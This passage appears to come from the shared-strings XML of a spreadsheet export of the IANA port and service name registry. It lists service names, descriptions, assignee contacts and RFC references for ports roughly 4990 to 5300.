    <t>BusySync Calendar Synch. Protocol</t>
  </si>
  <si>
    <t>[David_Riggle]</t>
  </si>
  <si>
    <t>Defined TXT keys: Proprietary</t>
  </si>
  <si>
    <t>vrt</t>
  </si>
  <si>
    <t>VITA Radio Transport</t>
  </si>
  <si>
    <t>[Sam_Bretheim]</t>
  </si>
  <si>
    <t>4992-4998</t>
  </si>
  <si>
    <t>hfcs-manager</t>
  </si>
  <si>
    <t>HFSQL Client/Server Database Engine Manager</t>
  </si>
  <si>
    <t>commplex-main</t>
  </si>
  <si>
    <t>commplex-link</t>
  </si>
  <si>
    <t>rfe</t>
  </si>
  <si>
    <t>radio free ethernet</t>
  </si>
  <si>
    <t>fmpro-internal</t>
  </si>
  <si>
    <t>FileMaker, Inc. - Proprietary transport</t>
  </si>
  <si>
    <t>FileMaker, Inc. - Proprietary name binding</t>
  </si>
  <si>
    <t>avt-profile-1</t>
  </si>
  <si>
    <t>RTP media data</t>
  </si>
  <si>
    <t>[RFC3551][RFC4571]</t>
  </si>
  <si>
    <t>[RFC3551]</t>
  </si>
  <si>
    <t>[RFC3551][RFC5762]</t>
  </si>
  <si>
    <t>avt-profile-2</t>
  </si>
  <si>
    <t>RTP control protocol</t>
  </si>
  <si>
    <t>wsm-server</t>
  </si>
  <si>
    <t>wsm server</t>
  </si>
  <si>
    <t>[Adam_Berk]</t>
  </si>
  <si>
    <t>wsm-server-ssl</t>
  </si>
  <si>
    <t>wsm server ssl</t>
  </si>
  <si>
    <t>synapsis-edge</t>
  </si>
  <si>
    <t>Synapsis EDGE</t>
  </si>
  <si>
    <t>[Paul_Schilling]</t>
  </si>
  <si>
    <t>winfs</t>
  </si>
  <si>
    <t>Microsoft Windows Filesystem</t>
  </si>
  <si>
    <t>[Simon_Skaria]</t>
  </si>
  <si>
    <t>telelpathstart</t>
  </si>
  <si>
    <t>TelepathStart</t>
  </si>
  <si>
    <t>[Helmuth_Breitenfelln]</t>
  </si>
  <si>
    <t>telelpathattack</t>
  </si>
  <si>
    <t>TelepathAttack</t>
  </si>
  <si>
    <t>nsp</t>
  </si>
  <si>
    <t>NetOnTap Service</t>
  </si>
  <si>
    <t>[Kim_Hancock]</t>
  </si>
  <si>
    <t>fmpro-v6</t>
  </si>
  <si>
    <t>[Alex_Chen]</t>
  </si>
  <si>
    <t>onpsocket</t>
  </si>
  <si>
    <t>Overlay Network Protocol</t>
  </si>
  <si>
    <t>[Roger_Matthias]</t>
  </si>
  <si>
    <t>fmwp</t>
  </si>
  <si>
    <t>FileMaker, Inc. - Web publishing</t>
  </si>
  <si>
    <t>5016-5019</t>
  </si>
  <si>
    <t>zenginkyo-1</t>
  </si>
  <si>
    <t>[Masashi_Suzaki]</t>
  </si>
  <si>
    <t>zenginkyo-2</t>
  </si>
  <si>
    <t>mice</t>
  </si>
  <si>
    <t>mice server</t>
  </si>
  <si>
    <t>[Alan_Clifford]</t>
  </si>
  <si>
    <t>htuilsrv</t>
  </si>
  <si>
    <t>Htuil Server for PLD2</t>
  </si>
  <si>
    <t>[Dennis_Reinhardt]</t>
  </si>
  <si>
    <t>scpi-telnet</t>
  </si>
  <si>
    <t>SCPI-TELNET</t>
  </si>
  <si>
    <t>[Ryan_Columbus]</t>
  </si>
  <si>
    <t>scpi-raw</t>
  </si>
  <si>
    <t>SCPI-RAW</t>
  </si>
  <si>
    <t>strexec-d</t>
  </si>
  <si>
    <t>Storix I/O daemon (data)</t>
  </si>
  <si>
    <t>[Storix_Inc]</t>
  </si>
  <si>
    <t>[David_Huffman]</t>
  </si>
  <si>
    <t>strexec-s</t>
  </si>
  <si>
    <t>Storix I/O daemon (stat)</t>
  </si>
  <si>
    <t>qvr</t>
  </si>
  <si>
    <t>Quiqum Virtual Relais</t>
  </si>
  <si>
    <t>[Philipp_Marcel_Albre]</t>
  </si>
  <si>
    <t>infobright</t>
  </si>
  <si>
    <t>Infobright Database Server</t>
  </si>
  <si>
    <t>[Mark_Windrim]</t>
  </si>
  <si>
    <t>surfpass</t>
  </si>
  <si>
    <t>SurfPass</t>
  </si>
  <si>
    <t>[Olivier_Guezenec]</t>
  </si>
  <si>
    <t>dmp</t>
  </si>
  <si>
    <t>Direct Message Protocol</t>
  </si>
  <si>
    <t>[Gjermund_Wallenius]</t>
  </si>
  <si>
    <t>signacert-agent</t>
  </si>
  <si>
    <t>SignaCert Enterprise Trust Server Agent</t>
  </si>
  <si>
    <t>[Harris_Corporation]</t>
  </si>
  <si>
    <t>[Daniel_R_Somerfield]</t>
  </si>
  <si>
    <t>jtnetd-server</t>
  </si>
  <si>
    <t>Janstor Secure Data</t>
  </si>
  <si>
    <t>[Janstor_Technology]</t>
  </si>
  <si>
    <t>[Anthony_Johnson_2]</t>
  </si>
  <si>
    <t>jtnetd-status</t>
  </si>
  <si>
    <t>Janstor Status</t>
  </si>
  <si>
    <t>5035-5041</t>
  </si>
  <si>
    <t>asnaacceler8db</t>
  </si>
  <si>
    <t>[Walter_Goodwin]</t>
  </si>
  <si>
    <t>swxadmin</t>
  </si>
  <si>
    <t>ShopWorX Administration</t>
  </si>
  <si>
    <t>[Don_W_Fitzpatrick]</t>
  </si>
  <si>
    <t>lxi-evntsvc</t>
  </si>
  <si>
    <t>LXI Event Service</t>
  </si>
  <si>
    <t>[Nick_Barendt]</t>
  </si>
  <si>
    <t>osp</t>
  </si>
  <si>
    <t>Open Settlement Protocol</t>
  </si>
  <si>
    <t>[Dmitry_Isakbayev]</t>
  </si>
  <si>
    <t>vpm-udp</t>
  </si>
  <si>
    <t>Vishay PM UDP Service</t>
  </si>
  <si>
    <t>[Ashley_Clarke]</t>
  </si>
  <si>
    <t>iscape</t>
  </si>
  <si>
    <t>iSCAPE Data Broadcasting</t>
  </si>
  <si>
    <t>[Roland_van_der_Veen]</t>
  </si>
  <si>
    <t>texai</t>
  </si>
  <si>
    <t>Texai Message Service</t>
  </si>
  <si>
    <t>[Stephen_Reed_2]</t>
  </si>
  <si>
    <t>ivocalize</t>
  </si>
  <si>
    <t>iVocalize Web Conference</t>
  </si>
  <si>
    <t>[Bryan_Vergato]</t>
  </si>
  <si>
    <t>mmcc</t>
  </si>
  <si>
    <t>multimedia conference control tool</t>
  </si>
  <si>
    <t>[Steve_Casner]</t>
  </si>
  <si>
    <t>ita-agent</t>
  </si>
  <si>
    <t>ITA Agent</t>
  </si>
  <si>
    <t>[Don_Merrell]</t>
  </si>
  <si>
    <t>ita-manager</t>
  </si>
  <si>
    <t>ITA Manager</t>
  </si>
  <si>
    <t>rlm</t>
  </si>
  <si>
    <t>RLM License Server</t>
  </si>
  <si>
    <t>[Matt_Christiano_2]</t>
  </si>
  <si>
    <t>rlm-disc</t>
  </si>
  <si>
    <t>RLM Discovery Server</t>
  </si>
  <si>
    <t>[Reprise_Software_Inc]</t>
  </si>
  <si>
    <t>[Matt_Christiano_3]</t>
  </si>
  <si>
    <t>rlm-admin</t>
  </si>
  <si>
    <t>RLM administrative interface</t>
  </si>
  <si>
    <t>unot</t>
  </si>
  <si>
    <t>UNOT</t>
  </si>
  <si>
    <t>[Gordon_Mohr_2]</t>
  </si>
  <si>
    <t>intecom-ps1</t>
  </si>
  <si>
    <t>Intecom Pointspan 1</t>
  </si>
  <si>
    <t>[David_Meermans]</t>
  </si>
  <si>
    <t>intecom-ps2</t>
  </si>
  <si>
    <t>Intecom Pointspan 2</t>
  </si>
  <si>
    <t>locus-disc</t>
  </si>
  <si>
    <t>Locus Discovery</t>
  </si>
  <si>
    <t>[Alan_King]</t>
  </si>
  <si>
    <t>sds</t>
  </si>
  <si>
    <t>SIP Directory Services</t>
  </si>
  <si>
    <t>[Arthur_Wilton]</t>
  </si>
  <si>
    <t>sip</t>
  </si>
  <si>
    <t>SIP</t>
  </si>
  <si>
    <t>[RFC3263]</t>
  </si>
  <si>
    <t>[RFC4168]</t>
  </si>
  <si>
    <t>sips</t>
  </si>
  <si>
    <t>SIP-TLS</t>
  </si>
  <si>
    <t>na-localise</t>
  </si>
  <si>
    <t>Localisation access</t>
  </si>
  <si>
    <t>[Jean_Pierre_Garcia_2]</t>
  </si>
  <si>
    <t>csrpc</t>
  </si>
  <si>
    <t>centrify secure RPC</t>
  </si>
  <si>
    <t>[Paul_Moore]</t>
  </si>
  <si>
    <t>ca-1</t>
  </si>
  <si>
    <t>Channel Access 1</t>
  </si>
  <si>
    <t>[Jeffrey_Hill]</t>
  </si>
  <si>
    <t>ca-2</t>
  </si>
  <si>
    <t>Channel Access 2</t>
  </si>
  <si>
    <t>stanag-5066</t>
  </si>
  <si>
    <t>STANAG-5066-SUBNET-INTF</t>
  </si>
  <si>
    <t>[Donald_G_Kallgren]</t>
  </si>
  <si>
    <t>authentx</t>
  </si>
  <si>
    <t>Authentx Service</t>
  </si>
  <si>
    <t>[Alberto_Fernandez]</t>
  </si>
  <si>
    <t>bitforestsrv</t>
  </si>
  <si>
    <t>Bitforest Data Service</t>
  </si>
  <si>
    <t>[Ville_Pekka_Vahteala]</t>
  </si>
  <si>
    <t>i-net-2000-npr</t>
  </si>
  <si>
    <t>I/Net 2000-NPR</t>
  </si>
  <si>
    <t>[Chris_Megede]</t>
  </si>
  <si>
    <t>vtsas</t>
  </si>
  <si>
    <t>VersaTrans Server Agent Service</t>
  </si>
  <si>
    <t>[Christopher_Miller]</t>
  </si>
  <si>
    <t>powerschool</t>
  </si>
  <si>
    <t>PowerSchool</t>
  </si>
  <si>
    <t>[Greg_Porter]</t>
  </si>
  <si>
    <t>ayiya</t>
  </si>
  <si>
    <t>Anything In Anything</t>
  </si>
  <si>
    <t>tag-pm</t>
  </si>
  <si>
    <t>Advantage Group Port Mgr</t>
  </si>
  <si>
    <t>alesquery</t>
  </si>
  <si>
    <t>ALES Query</t>
  </si>
  <si>
    <t>[Tim_Maloney]</t>
  </si>
  <si>
    <t>pvaccess</t>
  </si>
  <si>
    <t>Experimental Physics and Industrial Control System</t>
  </si>
  <si>
    <t>[Matej_Sekoranja]</t>
  </si>
  <si>
    <t>5076-5077</t>
  </si>
  <si>
    <t>pixelpusher</t>
  </si>
  <si>
    <t>PixelPusher pixel data</t>
  </si>
  <si>
    <t>[heroicrobotics.com]</t>
  </si>
  <si>
    <t>[Jasmine_Strong]</t>
  </si>
  <si>
    <t>cp-spxrpts</t>
  </si>
  <si>
    <t>Cambridge Pixel SPx Reports</t>
  </si>
  <si>
    <t>onscreen</t>
  </si>
  <si>
    <t>OnScreen Data Collection Service</t>
  </si>
  <si>
    <t>[Christopher_Miller_2]</t>
  </si>
  <si>
    <t>sdl-ets</t>
  </si>
  <si>
    <t>SDL - Ent Trans Server</t>
  </si>
  <si>
    <t>[Marc_Morin]</t>
  </si>
  <si>
    <t>qcp</t>
  </si>
  <si>
    <t>Qpur Communication Protocol</t>
  </si>
  <si>
    <t>[Joachim_Kluemper]</t>
  </si>
  <si>
    <t>qfp</t>
  </si>
  <si>
    <t>Qpur File Protocol</t>
  </si>
  <si>
    <t>llrp</t>
  </si>
  <si>
    <t>EPCglobal Low-Level Reader Protocol</t>
  </si>
  <si>
    <t>[Margaret_Wasserman][Paul_Dietrich]</t>
  </si>
  <si>
    <t>Defined TXT keys: None. RFID reader Low Level Reader Protocol</t>
  </si>
  <si>
    <t>encrypted-llrp</t>
  </si>
  <si>
    <t>EPCglobal Encrypted LLRP</t>
  </si>
  <si>
    <t>[Margaret_Wasserman]</t>
  </si>
  <si>
    <t>aprigo-cs</t>
  </si>
  <si>
    <t>Aprigo Collection Service</t>
  </si>
  <si>
    <t>[Ron_Zalkind]</t>
  </si>
  <si>
    <t>biotic</t>
  </si>
  <si>
    <t>BIOTIC - Binary Internet of Things Interoperable Communication</t>
  </si>
  <si>
    <t>[Waher_Data_AB]</t>
  </si>
  <si>
    <t>[Peter_Waher]</t>
  </si>
  <si>
    <t>5088-5089</t>
  </si>
  <si>
    <t>car</t>
  </si>
  <si>
    <t>Candidate AR</t>
  </si>
  <si>
    <t>cxtp</t>
  </si>
  <si>
    <t>2005-07</t>
  </si>
  <si>
    <t>[RFC4065]</t>
  </si>
  <si>
    <t>magpie</t>
  </si>
  <si>
    <t>Magpie Binary</t>
  </si>
  <si>
    <t>[Phil_Maker]</t>
  </si>
  <si>
    <t>sentinel-lm</t>
  </si>
  <si>
    <t>Sentinel LM</t>
  </si>
  <si>
    <t>[Derick_Snyder]</t>
  </si>
  <si>
    <t>hart-ip</t>
  </si>
  <si>
    <t>HART-IP</t>
  </si>
  <si>
    <t>[Wally_Pratt_Jr]</t>
  </si>
  <si>
    <t>5095-5098</t>
  </si>
  <si>
    <t>sentlm-srv2srv</t>
  </si>
  <si>
    <t>SentLM Srv2Srv</t>
  </si>
  <si>
    <t>socalia</t>
  </si>
  <si>
    <t>Socalia service mux</t>
  </si>
  <si>
    <t>[Alberto_Raydan_2]</t>
  </si>
  <si>
    <t>talarian-tcp</t>
  </si>
  <si>
    <t>Talarian_TCP</t>
  </si>
  <si>
    <t>[Leo_Martins]</t>
  </si>
  <si>
    <t>talarian-udp</t>
  </si>
  <si>
    <t>Talarian_UDP</t>
  </si>
  <si>
    <t>oms-nonsecure</t>
  </si>
  <si>
    <t>Oracle OMS non-secure</t>
  </si>
  <si>
    <t>actifio-c2c</t>
  </si>
  <si>
    <t>Actifio C2C</t>
  </si>
  <si>
    <t>[Ravi_Kollipara]</t>
  </si>
  <si>
    <t>tinymessage</t>
  </si>
  <si>
    <t>TinyMessage</t>
  </si>
  <si>
    <t>[Josip_Medved]</t>
  </si>
  <si>
    <t>hughes-ap</t>
  </si>
  <si>
    <t>Hughes Association Protocol</t>
  </si>
  <si>
    <t>[Varun_Santosh]</t>
  </si>
  <si>
    <t>actifioudsagent</t>
  </si>
  <si>
    <t>Actifio UDS Agent</t>
  </si>
  <si>
    <t>[Actifio]</t>
  </si>
  <si>
    <t>[Madhav_Mutalik]</t>
  </si>
  <si>
    <t>actifioreplic</t>
  </si>
  <si>
    <t>Disk to Disk replication between Actifio Clusters</t>
  </si>
  <si>
    <t>5108-5110</t>
  </si>
  <si>
    <t>taep-as-svc</t>
  </si>
  <si>
    <t>TAEP AS service</t>
  </si>
  <si>
    <t>[Liu_Changchun]</t>
  </si>
  <si>
    <t>pm-cmdsvr</t>
  </si>
  <si>
    <t>PeerMe Msg Cmd Service</t>
  </si>
  <si>
    <t>[Marcos_Della]</t>
  </si>
  <si>
    <t>ev-services</t>
  </si>
  <si>
    <t>Enterprise Vault Services</t>
  </si>
  <si>
    <t>[Richard_Jones_2]</t>
  </si>
  <si>
    <t>autobuild</t>
  </si>
  <si>
    <t>Symantec Autobuild Service</t>
  </si>
  <si>
    <t>[David_Warden]</t>
  </si>
  <si>
    <t>emb-proj-cmd</t>
  </si>
  <si>
    <t>EPSON Projecter Image Transfer</t>
  </si>
  <si>
    <t>[SEIKO_EPSON_4]</t>
  </si>
  <si>
    <t>gradecam</t>
  </si>
  <si>
    <t>GradeCam Image Processing</t>
  </si>
  <si>
    <t>[Robert_Porter]</t>
  </si>
  <si>
    <t>5118-5119</t>
  </si>
  <si>
    <t>barracuda-bbs</t>
  </si>
  <si>
    <t>Barracuda Backup Protocol</t>
  </si>
  <si>
    <t>[Barracuda_Networks]</t>
  </si>
  <si>
    <t>[Andrew_Blyler]</t>
  </si>
  <si>
    <t>5121-5132</t>
  </si>
  <si>
    <t>nbt-pc</t>
  </si>
  <si>
    <t>Policy Commander</t>
  </si>
  <si>
    <t>[Emily_Harris]</t>
  </si>
  <si>
    <t>ppactivation</t>
  </si>
  <si>
    <t>PP ActivationServer</t>
  </si>
  <si>
    <t>[Ian_Bradley]</t>
  </si>
  <si>
    <t>erp-scale</t>
  </si>
  <si>
    <t>ERP-Scale</t>
  </si>
  <si>
    <t>Defined TXT keys:
  RFC=&lt;RFC destination and status&gt;
  Device=&lt;Scale device and status&gt;</t>
  </si>
  <si>
    <t>minotaur-sa</t>
  </si>
  <si>
    <t>Minotaur SA</t>
  </si>
  <si>
    <t>[Kenneth_Flynn]</t>
  </si>
  <si>
    <t>ctsd</t>
  </si>
  <si>
    <t>MyCTS server port</t>
  </si>
  <si>
    <t>[Jilles_Oldenbeuving]</t>
  </si>
  <si>
    <t>5138-5144</t>
  </si>
  <si>
    <t>rmonitor-secure</t>
  </si>
  <si>
    <t>RMONITOR SECURE
IANA assigned this well-formed service name as a replacement for "rmonitor_secure".</t>
  </si>
  <si>
    <t>[Kory_Hamzeh]</t>
  </si>
  <si>
    <t>rmonitor_secure</t>
  </si>
  <si>
    <t>RMONITOR SECURE</t>
  </si>
  <si>
    <t>This entry is an alias to "rmonitor-secure".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>social-alarm</t>
  </si>
  <si>
    <t>Social Alarm Service</t>
  </si>
  <si>
    <t>[Shaun_Byrne]</t>
  </si>
  <si>
    <t>5147-5149</t>
  </si>
  <si>
    <t>atmp</t>
  </si>
  <si>
    <t>Ascend Tunnel Management Protocol</t>
  </si>
  <si>
    <t>esri-sde</t>
  </si>
  <si>
    <t>ESRI SDE Instance
    IANA assigned this well-formed service name as a replacement for "esri_sde".</t>
  </si>
  <si>
    <t>[Peter_Aronson]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on ports 5151 and 5152</t>
  </si>
  <si>
    <t>esri_sde</t>
  </si>
  <si>
    <t>ESRI SDE Instance</t>
  </si>
  <si>
    <t>This entry is an alias to "esri-sde".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>ESRI SDE Remote Start
    IANA assigned this well-formed service name as a replacement for "esri_sde".</t>
  </si>
  <si>
    <t>ESRI SDE Remote Start</t>
  </si>
  <si>
    <t>sde-discovery</t>
  </si>
  <si>
    <t>ESRI SDE Instance Discovery</t>
  </si>
  <si>
    <t>Historic usage was toruxserver. De-Assigned on 2018-04-19</t>
  </si>
  <si>
    <t>bzflag</t>
  </si>
  <si>
    <t>BZFlag game server</t>
  </si>
  <si>
    <t>[Tim_Riker]</t>
  </si>
  <si>
    <t>asctrl-agent</t>
  </si>
  <si>
    <t>Oracle asControl Agent</t>
  </si>
  <si>
    <t>rugameonline</t>
  </si>
  <si>
    <t>Russian Online Game</t>
  </si>
  <si>
    <t>[Andrey_Mohov]</t>
  </si>
  <si>
    <t>mediat</t>
  </si>
  <si>
    <t>Mediat Remote Object Exchange</t>
  </si>
  <si>
    <t>[Oliver_Anan]</t>
  </si>
  <si>
    <t>5158-5160</t>
  </si>
  <si>
    <t>snmpssh</t>
  </si>
  <si>
    <t>SNMP over SSH Transport Model</t>
  </si>
  <si>
    <t>[RFC5592]</t>
  </si>
  <si>
    <t>snmpssh-trap</t>
  </si>
  <si>
    <t>SNMP Notification over SSH Transport Model</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 5162</t>
  </si>
  <si>
    <t>sbackup</t>
  </si>
  <si>
    <t>Shadow Backup</t>
  </si>
  <si>
    <t>[Glenn_Allen]</t>
  </si>
  <si>
    <t>vpa</t>
  </si>
  <si>
    <t>Virtual Protocol Adapter</t>
  </si>
  <si>
    <t>[Douglas_Goodall]</t>
  </si>
  <si>
    <t>vpa-disc</t>
  </si>
  <si>
    <t>Virtual Protocol Adapter Discovery</t>
  </si>
  <si>
    <t>ife-icorp</t>
  </si>
  <si>
    <t>ife_1corp
IANA assigned this well-formed service name as a replacement for "ife_icorp".</t>
  </si>
  <si>
    <t>[Paul_Annala]</t>
  </si>
  <si>
    <t>ife_icorp</t>
  </si>
  <si>
    <t>ife_1corp</t>
  </si>
  <si>
    <t>This entry is an alias to "ife-icorp".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>winpcs</t>
  </si>
  <si>
    <t>WinPCS Service Connection</t>
  </si>
  <si>
    <t>[Complan_Network_AS]</t>
  </si>
  <si>
    <t>scte104</t>
  </si>
  <si>
    <t>SCTE104 Connection</t>
  </si>
  <si>
    <t>[Thomas_Russell]</t>
  </si>
  <si>
    <t>scte30</t>
  </si>
  <si>
    <t>SCTE30 Connection</t>
  </si>
  <si>
    <t>5169-5171</t>
  </si>
  <si>
    <t>pcoip-mgmt</t>
  </si>
  <si>
    <t>PC over IP Endpoint Management</t>
  </si>
  <si>
    <t>[Teradici_2]</t>
  </si>
  <si>
    <t>[Paul_Helter]</t>
  </si>
  <si>
    <t>5173-5189</t>
  </si>
  <si>
    <t>aol</t>
  </si>
  <si>
    <t>America-Online</t>
  </si>
  <si>
    <t>[Marty_Lyons]</t>
  </si>
  <si>
    <t>aol-1</t>
  </si>
  <si>
    <t>AmericaOnline1</t>
  </si>
  <si>
    <t>[Bruce_Mackey]</t>
  </si>
  <si>
    <t>aol-2</t>
  </si>
  <si>
    <t>AmericaOnline2</t>
  </si>
  <si>
    <t>aol-3</t>
  </si>
  <si>
    <t>AmericaOnline3</t>
  </si>
  <si>
    <t>cpscomm</t>
  </si>
  <si>
    <t>CipherPoint Config Service</t>
  </si>
  <si>
    <t>[CipherPoint]</t>
  </si>
  <si>
    <t>ampl-lic</t>
  </si>
  <si>
    <t>The protocol is used by a license server and client programs to control use of program licenses that float to networked machines</t>
  </si>
  <si>
    <t>[AMPL_Optimization]</t>
  </si>
  <si>
    <t>[David_M_Gay]</t>
  </si>
  <si>
    <t>ampl-tableproxy</t>
  </si>
  <si>
    <t>The protocol is used by two programs that exchange "table" data used in the AMPL modeling language</t>
  </si>
  <si>
    <t>tunstall-lwp</t>
  </si>
  <si>
    <t>Tunstall Lone worker device interface</t>
  </si>
  <si>
    <t>[Tunstall_Healthcare_UK_Ltd]</t>
  </si>
  <si>
    <t>[Robert_Moore]</t>
  </si>
  <si>
    <t>5198-5199</t>
  </si>
  <si>
    <t>targus-getdata</t>
  </si>
  <si>
    <t>TARGUS GetData</t>
  </si>
  <si>
    <t>[John_Keaveney]</t>
  </si>
  <si>
    <t>targus-getdata1</t>
  </si>
  <si>
    <t>TARGUS GetData 1</t>
  </si>
  <si>
    <t>targus-getdata2</t>
  </si>
  <si>
    <t>TARGUS GetData 2</t>
  </si>
  <si>
    <t>targus-getdata3</t>
  </si>
  <si>
    <t>TARGUS GetData 3</t>
  </si>
  <si>
    <t>5204-5208</t>
  </si>
  <si>
    <t>nomad</t>
  </si>
  <si>
    <t>Nomad Device Video Transfer</t>
  </si>
  <si>
    <t>[Morega_System]</t>
  </si>
  <si>
    <t>[Ashraf_Tahir]</t>
  </si>
  <si>
    <t>5210-5214</t>
  </si>
  <si>
    <t>noteza</t>
  </si>
  <si>
    <t>NOTEZA Data Safety Service</t>
  </si>
  <si>
    <t>[CNS_a.s.]</t>
  </si>
  <si>
    <t>[Pavel_Mendl_2]</t>
  </si>
  <si>
    <t>5216-5220</t>
  </si>
  <si>
    <t>3exmp</t>
  </si>
  <si>
    <t>3eTI Extensible Management Protocol for OAMP</t>
  </si>
  <si>
    <t>[Bill_Rettig]</t>
  </si>
  <si>
    <t>xmpp-client</t>
  </si>
  <si>
    <t>XMPP Client Connection</t>
  </si>
  <si>
    <t>[RFC6120]</t>
  </si>
  <si>
    <t>hpvirtgrp</t>
  </si>
  <si>
    <t>HP Virtual Machine Group Management</t>
  </si>
  <si>
    <t>[John_Williams]</t>
  </si>
  <si>
    <t>hpvirtctrl</t>
  </si>
  <si>
    <t>HP Virtual Machine Console Operations</t>
  </si>
  <si>
    <t>hp-server</t>
  </si>
  <si>
    <t>HP Server</t>
  </si>
  <si>
    <t>[Brett_Green_2]</t>
  </si>
  <si>
    <t>hp-status</t>
  </si>
  <si>
    <t>HP Status</t>
  </si>
  <si>
    <t>perfd</t>
  </si>
  <si>
    <t>HP System Performance Metric Service</t>
  </si>
  <si>
    <t>[Chris_Bertin]</t>
  </si>
  <si>
    <t>hpvroom</t>
  </si>
  <si>
    <t>HP Virtual Room Service</t>
  </si>
  <si>
    <t>[Scott_Levin]</t>
  </si>
  <si>
    <t>jaxflow</t>
  </si>
  <si>
    <t>Netflow/IPFIX/sFlow Collector and Forwarder Management</t>
  </si>
  <si>
    <t>[JaxMP]</t>
  </si>
  <si>
    <t>[Stephen_Hull]</t>
  </si>
  <si>
    <t>jaxflow-data</t>
  </si>
  <si>
    <t>JaxMP RealFlow application and protocol data</t>
  </si>
  <si>
    <t>crusecontrol</t>
  </si>
  <si>
    <t>Remote Control of Scan Software for Cruse Scanners</t>
  </si>
  <si>
    <t>[Cruse_Spezialmaschinen_GmbH]</t>
  </si>
  <si>
    <t>[Christof_J._Reetz_2]</t>
  </si>
  <si>
    <t>csedaemon</t>
  </si>
  <si>
    <t>Cruse Scanning System Service</t>
  </si>
  <si>
    <t>[Christof_J_Reetz]</t>
  </si>
  <si>
    <t>enfs</t>
  </si>
  <si>
    <t>Etinnae Network File Service</t>
  </si>
  <si>
    <t>[Chris_Peel]</t>
  </si>
  <si>
    <t>eenet</t>
  </si>
  <si>
    <t>EEnet communications</t>
  </si>
  <si>
    <t>[Helmut_Giritzer]</t>
  </si>
  <si>
    <t>galaxy-network</t>
  </si>
  <si>
    <t>Galaxy Network Service</t>
  </si>
  <si>
    <t>[Michael_Andre_2]</t>
  </si>
  <si>
    <t>padl2sim</t>
  </si>
  <si>
    <t>mnet-discovery</t>
  </si>
  <si>
    <t>m-net discovery</t>
  </si>
  <si>
    <t>[Andy_Crick]</t>
  </si>
  <si>
    <t>5238-5244</t>
  </si>
  <si>
    <t>downtools</t>
  </si>
  <si>
    <t>DownTools Control Protocol</t>
  </si>
  <si>
    <t>[Jarrod_Sayers]</t>
  </si>
  <si>
    <t>downtools-disc</t>
  </si>
  <si>
    <t>DownTools Discovery Protocol</t>
  </si>
  <si>
    <t>capwap-control</t>
  </si>
  <si>
    <t>CAPWAP Control Protocol</t>
  </si>
  <si>
    <t>[RFC5415]</t>
  </si>
  <si>
    <t>capwap-data</t>
  </si>
  <si>
    <t>CAPWAP Data Protocol</t>
  </si>
  <si>
    <t>caacws</t>
  </si>
  <si>
    <t>CA Access Control Web Service</t>
  </si>
  <si>
    <t>[Gabriel_Kalmar]</t>
  </si>
  <si>
    <t>caaclang2</t>
  </si>
  <si>
    <t>CA AC Lang Service</t>
  </si>
  <si>
    <t>soagateway</t>
  </si>
  <si>
    <t>soaGateway</t>
  </si>
  <si>
    <t>[Greg_Bodine]</t>
  </si>
  <si>
    <t>caevms</t>
  </si>
  <si>
    <t>CA eTrust VM Service</t>
  </si>
  <si>
    <t>[Kevin_Bond]</t>
  </si>
  <si>
    <t>movaz-ssc</t>
  </si>
  <si>
    <t>Movaz SSC</t>
  </si>
  <si>
    <t>[Lou_Berger]</t>
  </si>
  <si>
    <t>kpdp</t>
  </si>
  <si>
    <t>Kohler Power Device Protocol</t>
  </si>
  <si>
    <t>[Bill_Gross]</t>
  </si>
  <si>
    <t>logcabin</t>
  </si>
  <si>
    <t>LogCabin storage service</t>
  </si>
  <si>
    <t>[Diego_Ongaro]</t>
  </si>
  <si>
    <t>5255-5263</t>
  </si>
  <si>
    <t>3com-njack-1</t>
  </si>
  <si>
    <t>3Com Network Jack Port 1</t>
  </si>
  <si>
    <t>[Abhay_Rajaram]</t>
  </si>
  <si>
    <t>3com-njack-2</t>
  </si>
  <si>
    <t>3Com Network Jack Port 2</t>
  </si>
  <si>
    <t>5266-5268</t>
  </si>
  <si>
    <t>xmpp-server</t>
  </si>
  <si>
    <t>XMPP Server Connection</t>
  </si>
  <si>
    <t>cartographerxmp</t>
  </si>
  <si>
    <t>Cartographer XMP</t>
  </si>
  <si>
    <t>[Bobby_Krupczak_2]</t>
  </si>
  <si>
    <t>cuelink</t>
  </si>
  <si>
    <t>StageSoft CueLink messaging</t>
  </si>
  <si>
    <t>[Todd_Pichler]</t>
  </si>
  <si>
    <t>cuelink-disc</t>
  </si>
  <si>
    <t>StageSoft CueLink discovery</t>
  </si>
  <si>
    <t>pk</t>
  </si>
  <si>
    <t>PK</t>
  </si>
  <si>
    <t>[Patrick_Kara]</t>
  </si>
  <si>
    <t>5273-5279</t>
  </si>
  <si>
    <t>xmpp-bosh</t>
  </si>
  <si>
    <t>Bidirectional-streams Over Synchronous HTTP (BOSH)</t>
  </si>
  <si>
    <t>[Peter_Saint_Andre]</t>
  </si>
  <si>
    <t>undo-lm</t>
  </si>
  <si>
    <t>Undo License Manager</t>
  </si>
  <si>
    <t>[Undo_Ltd]</t>
  </si>
  <si>
    <t>[Edward_Moffett]</t>
  </si>
  <si>
    <t>transmit-port</t>
  </si>
  <si>
    <t>Marimba Transmitter Port</t>
  </si>
  <si>
    <t>[Johan_Eriksson]</t>
  </si>
  <si>
    <t>5283-5297</t>
  </si>
  <si>
    <t>presence</t>
  </si>
  <si>
    <t>XMPP Link-Local Messaging</t>
  </si>
  <si>
    <t>[Eric_St_Onge]</t>
  </si>
  <si>
    <t>Defined TXT keys: See http://www.xmpp.org/registrar/linklocal.html</t>
  </si>
  <si>
    <t>nlg-data</t>
  </si>
  <si>
    <t>NLG Data Service</t>
  </si>
  <si>
    <t>[Andy_Shellam]</t>
  </si>
  <si>
    <t>hacl-hb</t>
  </si>
  <si>
    <t>HA cluster heartbeat</t>
  </si>
  <si>
    <t>[Eric_Soderberg_2][Edward_Yim]</t>
  </si>
  <si>
    <t>hacl-gs</t>
  </si>
  <si>
    <t>HA cluster general services</t>
  </si>
  <si>
    <t>hacl-cfg</t>
  </si>
  <si>
    <t>HA cluster configuration</t>
  </si>
  <si>
    <t>hacl-probe</t>
  </si>
  <si>
    <t>HA cluster probing</t>
  </si>
  <si>
    <t>hacl-local</t>
  </si>
  <si>
    <t>HA Cluster Commands</t>
  </si>
  <si>
    <t>hacl-test</t>
  </si>
  <si>
    <t>HA Cluster Test</t>
  </si>
  <si>
    <t>sun-mc-grp</t>
  </si>
  <si>
